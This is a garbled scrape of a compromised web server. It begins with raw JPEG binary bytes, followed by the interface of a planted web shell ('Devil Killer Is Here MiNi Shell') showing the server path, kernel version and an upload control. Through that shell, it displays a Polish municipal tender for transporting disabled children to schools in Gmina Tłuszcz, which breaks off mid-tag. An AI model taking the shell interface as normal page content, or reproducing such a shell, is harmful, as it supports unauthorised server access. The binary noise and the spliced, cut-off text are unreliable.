JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211123/0028094401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci niepełnosprawnych z terenu Gminy Tłuszcz do placówek oświatowych <br/>w okresie styczeń-czerwiec 2022 r </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Wspólnych w Tłuszczu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366060955</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tłuszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zopo_xl@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">cuwtluszcz.bip.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci niepełnosprawnych z terenu Gminy Tłuszcz do placówek oświatowych <br/>w okresie styczeń-czerwiec 2022 r </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3df6238a-4c48-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00280944</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00113874/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz dzieci niepełnosprawnych z terenu Gminy Tłuszcz do placówek oświatowych w okresie styczeń-czerwiec 2022 r</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> cuwtluszcz.bip.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">niniejszym<br/>postępowaniukomunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków<br/>komunikacjielektronicznej, za pośrednictwem Platformy on-line działającej pod<br/>https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ Wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty<br/>lub wniosku oraz do formularza do komunikacji.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w regulaminie korzystania z miniPortalu.<br/>3. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu określone w regulaminie miniPortalu oraz zobowiązuje się<br/>korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i<br/>wycofania oferty oraz do komunikacji wynosi 150MB.<br/>5. Za datę przekazania oferty, oświadczenia, o którym mowa w art.125ust.1 pzp, podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>6. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy<br/>i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza<br/>dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji).<br/>Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem ogłoszenia (BZP).<br/>7. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: zopo_xl@wp.pl.<br/>8. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email:<br/>zopo_xl@wp.pl.<br/>9. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej pod adresem:<br/>1. https://miniportal.uzp.gov.pl/<br/>2. Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej w<br/>formacie danych *.doc, *.docx, *.pdf i podpisana kwalifikowanym podpisem elektronicznym.<br/>3. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia<br/>1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę<br/>przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem<br/>polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi<br/>jawną część skompresowane do jednego pliku archiwum (ZIP).<br/>4. W przypadku przedstawienia przez wykonawcę rozbieżnych informacji pomiędzy podanymi w<br/>formularzu oferty a informacjami wpisanymi przy składaniu oferty na platformie Market Planet wiążące<br/>dla Zamawiającego będą podane tylko i wyłącznie informacje podane w formularzu oferty składanym<br/>elektronicznie i podpisanym kwalifikowanym podpisem elektronicznym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązkuz przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1) administratorem Pani/Pana danych<br/>osobowychjest: Gmina Tłuszcz, 05-240 Tłuszcz, ul. Warszawska 10;2) administrator wyznaczył<br/>Inspektora DanychOsobowych, z którym można się kontaktować pod adresem e-mail:<br/>iod.tluszcz@edukompetencje.plPani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1<br/>lit. c RODO w celu związanymz przedmiotowym postępowaniem o udzielenie zamówienia publicznego,<br/>prowadzonym w trybieprzetargu nieograniczonego.3) odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty,którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74<br/>ustawy P.Z.P.4)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez<br/>okres 4 lat oddnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;5) obowiązek podania<br/>przezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowymokreślonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o<br/>udzieleniezamówienia publicznego.6) w odniesieniu do Pani/Pana danych osobowych decyzje nie<br/>będąpodejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.7) posiada Pani/Pan:a)<br/>napodstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku,gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłkumoże zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celusprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonegopostępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO prawo do<br/>sprostowaniaPani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy wzakresie niezgodnym z ustawą P.Z.P. oraz nie może naruszać integralności protokołu oraz<br/>jegozałączników);c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/>w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;8) nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięciadanych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w<br/>art.20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych,<br/>gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>9)przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODOprzetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym<br/>dlaprzedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.272.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia<br/>1.	Przedmiotem zamówienia jest dowożenie uczniów niepełnosprawnych z terenu Gminy Tłuszcz do:<br/>a)	Zespołu Szkół w Kozłach uczniów zamieszkałych w:<br/>- Jaźwie 1 uczeń<br/>- Pólko 1 uczeń<br/>- Zalesie 1 uczeń<br/>- Postoliska 2 uczniów<br/>- Tłuszcz 5 uczniów<br/>- Moczydło 2 uczniów<br/><br/>Dowóz uczniów do Zespołu Szkół w Kozłach będzie odbywał się w 2 grupach:<br/>- do godz. 8.00 przywóz I grupy<br/>- około godz. 12.00 przywóz II grupy, z jednoczesnym odbiorem I grupy<br/>- około godz. 15.30 - 17.00 odbiór II grupy.<br/><br/>b)	Szkoły Podstawowej im.Królowej Jadwigi w Tłuszczu uczniów zamieszkałych :<br/>- Tłuszcz 1 uczeń (uczeń porusza się na wózku inwalidzkim)<br/>c)	Zespołu Szkół Specjalnych w Ostrówku uczniów zamieszkałych:<br/>- Jasienica 1 uczeń<br/>- Wilczeniec 2 uczniów<br/>- Tłuszcz 2 uczniów<br/>d)	Szkoły Podstawowej Specjalnej w Radzyminie ul.Komunalna 8 uczniów zamieszkałych:<br/>- Tłuszcz 1 uczeń<br/>e)	Zespół Szkół Specjalnych w Wołominie ul.Miła 22 uczniów zamieszkałych:<br/>- Szymanówek 1 uczeń<br/>f)	Szkoła Podstawowa w Specjalnym Ośrodku Szkolno-Wychowawczym w Wyszkowie ul.Zakolejowa 15a uczniów zamieszkałych:<br/>- Tłuszcz 2 uczniów (internat, transport 2 razy w tygodniu).<br/>2.	Okres realizacji: od 03 stycznia 2022r. do 24 czerwca 2022r. w dni nauki szkolnej.<br/>3.	Szacunkowa liczba dni dowożenia wynosi 108.<br/>4.	Szacunkowa liczba kilometrów dowozu i przywozu uczniów wynosi 365 km dziennie.<br/>5.	Dowożenie ma być zorganizowane w sposób umożliwiający uczniom rozpoczęcie zajęć <br/>w szkole, zgodnie i punktualnie z planem lekcji.<br/>6.	Dowożeniem objętych będzie 22 dzieci uczęszczających do szkół podstawowych zgodnie <br/>z wykazem zawierającym dane: adres zamieszkania ucznia, telefon kontaktowy do rodzica/opiekuna i adres placówki do której uczęszcza dziecko, który Wykonawca otrzyma po podpisaniu umowy.<br/>7.	Wykonawca zobowiązany jest <br/>1)	zapewnić opiekunów przewożonym dzieciom, według następujących zasad:<br/>a)	opiekun będzie odbierał dzieci od rodziców (opiekunów) spod domu (budynku) i po odwiezieniu do placówki oświatowej będzie przekazywał dzieci pod opiekę nauczyciela,<br/>b)	po zakończeniu zajęć opiekun będzie odbierał dzieci od nauczyciela i po dowiezieniu pod dom (budynek) przekazywał pod opiekę rodziców (opiekunów);<br/>c)	opiekun sprawuje nadzór nad uczniami w trakcie jazdy oraz zapewnia pomoc w czasie wsiadania oraz wysiadania z pojazdu<br/>d)	opiekun posiada przeszkolenie w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej.<br/>2)	przestrzegać i stosować przepisy rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO), a w tym przetwarzać posiadane dane osobowe jedynie w celu związanym z wykonywaniem umowy o dowóz oraz zabezpieczyć je w sposób zgodny z prawem przed dostępem osób nieuprawnionych;<br/>3)	posiadać licencję na wykonywanie transportu drogowego osób, jak też przestrzegać zasad ruchu drogowego;<br/>4)	działać w sposób racjonalny, tj. łączyć w grupy dzieci na tej samej trasie i w zbliżonych terminach dowozu, zapewniając jednocześnie możliwie najkrótszy czas przebywania dziecka w podróży. <br/>5)	Zamawiający zastrzega sobie prawo do zmian w zakresie zmian osobowych w tym do zmian liczby dzieci, adresów zamieszkania dowożonych dzieci lub adresów placówek. <br/>O każdej zmianie Zamawiający poinformuje Wykonawcę podając wymagane dane.<br/>6)	przed przystąpieniem do realizacji usługi Wykonawca ustali optymalny rozkład jazdy, mając na uwadze jak najkrótszy czas przebywania dzieci w podróży i jak najkrótsze oczekiwanie w szkole/ośrodku na rozpoczęcie zajęć i na transport powrotny z uwzględnieniem następujących warunków:<br/>a)	uczniów należy dowieźć na zajęcia do placówki w takim czasie, aby mogli rozpocząć zajęcia szkolne zgodnie z planem - dowiezienie nie wcześniej niż po otwarciu świetlicy w placówkach, odebranie po ich zakończeniu, bez zbędnego oczekiwania i przed zamknięciem świetlicy;<br/>b)	odbiór dzieci następuje od rodziców/opiekunów i po odwiezieniu na zajęcia należy przekazać dziecko bezpośrednio pod opiekę nauczycieli. Po zakończeniu zajęć Wykonawca będzie odbierał dzieci od nauczycieli i po odwiezieniu do domu przekazywał je pod opiekę rodziców lub opiekunów;<br/>c)	czas przebywania dzieci w podróży powinien być możliwie jak najkrótszy;<br/>d)	Wykonawca uwzględni przy wykonywaniu umowy tygodniowy plan lekcji dowożonych dzieci oraz dni, w których prowadzone są zajęcia dydaktyczne. Szczegółowe godziny odbioru poszczególnych dzieci ustali Wykonawca z rodzicami/opiekunami dzieci <br/>i dyrektorami placówek, do których uczęszczają dzieci;<br/>e)	nie dopuszcza się łączenia przewozu dzieci z terenu Gminy z przewozem dzieci innych gmin bez uzgodnienia z Zamawiającym i jego pisemnej zgody na taką modyfikację sposobu wykonania zamówienia – nawet jeżeli trasa i czas przejazdu z Gminy do szkoły lub ośrodka stanowiących koniec trasy nie uległyby w związku z tym wydłużeniu.<br/>f)	ustalony rozkład jazdy podlega zatwierdzeniu przez Zamawiającego.<br/><br/>7)	Wykonawca gwarantuje, że usługi będą świadczone przy użyciu pojazdów samochodowych przystosowanych do przewozów osób niepełnosprawnych, ze sprawną klimatyzacją:<br/>a)	wszystkie samochody, którymi przewożone są dzieci są odpowiednio oznakowane;<br/>b)	wszystkie samochody ze stosownym dowodem rejestracyjnym, którymi przewożone są dzieci posiadają obowiązkowe ubezpieczenie komunikacyjne OC i NW – do wglądu przed podpisaniem umowy;<br/>c)	pojazdy nie mogą być starsze niż 9 lat<br/>d)	Wykonawca zapewni przynajmniej jeden samochód przystosowany do przewozu osób niepełnosprawnych, który posiada sprzęt ułatwiający wsiadanie i wysiadanie dziecku poruszającemu się na wózku, w postaci: wind lub najazdów dla wózków inwalidzkich oraz odpowiednie zabezpieczenia dla przewozu dzieci i wózków.<br/>8)	Wykonawca w ramach przedmiotowej usługi zgodnie z ustawą z dnia 6 września 2001 r. <br/>o transporcie drogowym zatrudni kierowców posiadających odpowiednie uprawnienie do kierowania pojazdem samochodowym określone w ustawie z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym i przeszkolenie w zakresie pierwszej pomocy.<br/>9)	Osobą powołaną do sprawowania opieki nad dziećmi nie może być kierowca pojazdu.<br/>10)	Wykonawca zapewni w okresie trwania umowy na danej trasie przewozu dzieci tych samych pracowników, dokonując tylko minimalnych zmian osobowych i tylko w uzasadnionych przypadkach.<br/>11)	Każda zmiana wprowadzona do organizacji dowozu wymaga niezwłocznego powiadomienia (nie później niż w ciągu 2 dni od dnia wprowadzenia zmiany) Zamawiającego na piśmie i dołączenia wymaganych dokumentów.<br/>12)	Kierowcy Wykonawcy skierowani do wykonania przedmiotowych usług posiadają aktualne zaświadczenie o dopuszczeniu do wykonywania zawodu kierowcy wydane przez uprawnionego lekarza do badania kierowców oraz Kierowcy i Opiekunowie Wykonawcy posiadają zaświadczenie o przeszkoleniu w zakresie przepisów BHP i ppoż. oraz udzielania pierwszej pomocy.<br/>13)	Wykonawca bierze na siebie odpowiedzialność za zrekompensowanie szkód wynikających z wypadków lub wszelkiego rodzaju zdarzeń wynikłych w czasie wykonywania usługi. Jest zobowiązany do naprawienia szkody powstałej na skutek wypadku i zdarzeń mających miejsce w trakcie wykonywania usługi z winy Wykonawcy. Wykonawca w pełnym okresie realizacji umowy będzie posiadał aktualną polisę/umowę OC w zakresie prowadzonej działalności, której kopię przekazuje Zamawiającemu w dniu podpisania umowy i w przypadku konieczności dokonania stosownego przedłużenia terminu jej ważności zobowiązuje się do dokonania przedłużenia ważności polisy na czas obowiązywania umowy.<br/>14)	Przed przystąpieniem do realizacji przedmiotu zamówienia - dowozu dzieci, Wykonawca przedstawi aktualne dokumenty potwierdzające dopuszczenie pojazdów do ruchu (dowód rejestracyjny potwierdzający aktualny stan techniczny pojazdu) a w przypadku gdy przedsiębiorca nie jest właścicielem tych pojazdów również dokument potwierdzający tytuł prawny do dysponowania nimi oraz dokumenty potwierdzające posiadanie ubezpieczenia OC i NW.<br/>15)	Do 15 stycznia 2022 r. Wykonawca przekaże do Centrum Usług Wspólnych w Tłuszczu szczegółowy harmonogram dowozu dzieci.<br/>16)	W przypadku czasowej niemożności świadczenia usług przewozowych z uzasadnionych przyczyn Wykonawca zobowiązuje się do niezwłocznego zorganizowania zastępstwa zapewniającego równorzędny poziom usług. Przez uzasadnione przyczyny strony rozumieją np. awarię techniczną pojazdu. <br/>17)	W przypadku, o którym mowa w pkt 16 Zamawiający nie ponosi odpowiedzialności za rozliczenia Wykonawcy z organizatorem transportu zastępczego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 